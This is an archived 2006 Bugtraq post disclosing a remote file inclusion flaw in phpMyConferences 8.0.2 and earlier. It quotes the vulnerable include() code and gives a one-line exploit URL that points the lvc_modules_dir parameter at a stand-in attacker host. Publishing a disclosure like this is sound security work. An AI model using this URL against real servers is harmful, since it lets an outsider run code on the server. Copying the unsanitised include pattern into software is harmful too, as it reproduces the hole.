lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 31 Oct 2006 15:56:01 -0000
From: mfp.c@...mail.com
To: bugtraq@...urityfocus.com
Subject: phpMyConferences <= 8.0.2 Remote File Inclusion

# phpMyConferences <= 8.0.2 Remote File Inclusion
#
# Found by mfp.c => mfp.c@...mail.com [brazil rlz]
#
#  Greetz: F-117, Silver lords e pra tu pri :*
################################################
#	
#
# Arquivo: library.inc.php
# 
# Bug: 	
#   	if (!$gloaded_modules[$image_name])
#      		  {
#            		include($lvc_modules_dir.'/'.$module_name.'.module.php');
#            		$gloaded_modules[$module_name] = true;
#       	 }
#
#
# Exploit:
#
# http://localhost/phpMyConferences_8.0.2/common/visiteurs/include/library.inc.php?lvc_modules_dir=http://attack/
#
#
# THANKS: Milw0rm,str0ke, google....
#
#
###############################################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ